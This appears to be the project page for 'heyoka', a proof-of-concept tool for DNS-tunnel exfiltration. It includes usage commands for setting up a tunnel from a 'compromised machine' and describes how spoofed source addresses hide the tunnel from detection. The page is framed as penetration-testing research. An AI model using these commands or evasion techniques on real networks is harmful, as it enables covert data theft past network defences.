"Heyoka are thought of as being backwards-forwards, upside-down, or contrary in nature. This spirit is often manifest by doing things backwards or unconventionally -- riding a horse backwards, wearing clothes inside-out, or speaking in a backwards language." (source Wikipedia)
Heyoka is a Proof of Concept of an exfiltration tool which uses spoofed DNS requests to create a bidirectional tunnel. It aims to achieve both performance and stealth, and is released under the GPLv2.
The project is not under active development anymore (for a number of reasons explained in the FAQ), but feel free to play with it. Just... expect bugs :)
The tunnel is up to 60% faster compared to existing tools, thanks to a different encoding that is used in the packets. Additionally, heyoka can spread traffic across multiple name servers and spoof the source addresses of other hosts within the network. This way, the traffic signature gets spread across the whole internal network, making the tunnel endpoint significantly harder to spot.
Heyoka is 100% written in C, which means that it runs natively without the need of interpreters installed on the machine, which is extremely useful in a penetration testing scenario.
The overall idea is to investigate new patterns of data exfiltration that use spoofed packets to avoid detection.
We presented the concept at multiple conferences. Have a look at the slides from Shakacon if you want to get a bigger picture ... or just download and try! :)
buffer.c:268 : if buffer->endbuf is zero and you have enough data in the socket to fill the whole buffer, you are about to have trouble. Add an IF clause so that the call to net_read(), in such a case, reads a bit less.
What is the purpose of heyoka or a DNS tunnel anyway?
You might find yourself sitting in locked down network that only allows traffic to be send through an authenticated proxy or not even that. There's a good chance that DNS however will be routed through. In that case you can use DNS tunnels to send and receive arbitrary traffic from the "outside world". Alternatively, you might be in a penetration test, and you can run commands with administrative privileges on some machine deep inside the target network, that can only communicate with the outside world through DNS requests passed to the internal DNS server. In all these cases, a DNS tunnel can be a reliable (albeit not very fast) way to communicate.
How do I get heyoka to run?
There is only one heyoka executable, which is capable of being both the 'master' and the 'slave'.
Start by running heyoka in master mode on the machine which is authoritative name server for the domain you are using. Assuming that you are going to contact some service listening on the other side (e.g.: RDP), the syntax will be as follows:
heyoka.exe -m -d mydomain.com -l -p 8080
This will start the fake DNS server, and create a local listening TCP socket on port 8080. Then start heyoka in slave mode on the internal/compromised machine with the following syntax:
heyoka.exe -s -d mydomain.com -p 3389
This will create the tunnel, and all you have to do is to fire off a RDP client and point it to the 'master' machine on port 8080.
If it's the internal/compromised machine that needs to contact a service on the external box, simply use '-l' (which stands for 'listen') on the slave side instead. Keep in mind that the code is in alpha stage, so you might experience crashes and other unexpected behavior.
Which Operating Systems are currently supported?
Heyoka has only been tested on Windows 2003. However, porting the code to Unix-like operating system would not be too difficult
Not in active development? Why?
Well, initially the idea was to create a stable tool that could be used by penetration testers in very difficult data extraction scenarios. However, shortly after releasing the first alpha, life got in the way and we (the authors) ended up working in different companies, with little time to keep working on this tool. However, this should not stop you from experimenting with the code and build upon it, if you want. There is plenty of research that can still be done on data exfiltration via spoofed traffic!
Who are you?
- icesurfer: r00t [at] northernfortress [dot] net
- nico: http://www.leidecker.info